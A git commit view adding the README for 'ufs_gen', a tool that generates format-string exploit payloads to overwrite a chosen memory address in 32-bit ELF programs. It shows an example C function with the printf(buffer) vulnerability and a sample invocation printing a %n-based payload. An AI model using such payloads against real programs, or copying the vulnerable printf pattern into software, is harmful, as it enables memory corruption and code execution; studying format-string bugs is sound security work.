summaryrefslogtreecommitdiff
path: root/README
diff options
context:
space:
mode:
authorOlivier Gayot <duskcoder@gmail.com>2014-01-26 15:05:01 +0000
committerOlivier Gayot <duskcoder@gmail.com>2014-01-27 00:10:11 +0000
commitb3122c208b43e8dd775b49c5023f728e14e0156e (patch)
treed1fd0d48461e4afa7789fec4f8da5ee9c9f14d90 /README
initial commit
Diffstat (limited to 'README')
-rw-r--r--README51
1 files changed, 51 insertions, 0 deletions
diff --git a/README b/README
new file mode 100644
index 0000000..b2d9679
--- /dev/null
+++ b/README
@@ -0,0 +1,51 @@
+ufs_gen
+=======
+
+This software allows you to generate a payload which may override an address
+with the value of your choice.
+
+The syntax is quite simple:
+
+There are three parameters needed for the program to run correctly.
+
+stackidx: this parameter specifies how many dwords you need to access the
+beginning of your buffer (or payload).
+
+override: the address to override
+
+with: the value to inject at the address overriden
+
+This software is intended to work with an ELF32 generated by a typical code.
+
+example:
+
+int function(const char *payload)
+{
+ char buffer[BUFSIZ];
+
+ strncpy(buffer, payload, sizeof(buffer));
+ buffer[sizeof(buffer) - 1] = '\0';
+
+ printf(buffer);
+
+ return 0;
+}
+
+The support of ELF64 and other formats is intended but not written yet.
+Although the option 'addrsize' might already be used to specify if an address
+is not 4 bytes long, there is very few chances that it would work correctly.
+
+The support of printf(payload) directly (i.e. without a temporary buffer) is
+also planned.
+
+Example
+=======
+
+user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
+D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
+
+License
+=======
+
+This software is free software covered by the GPL license v2. You should
+read the COPYING file to understand what is implied.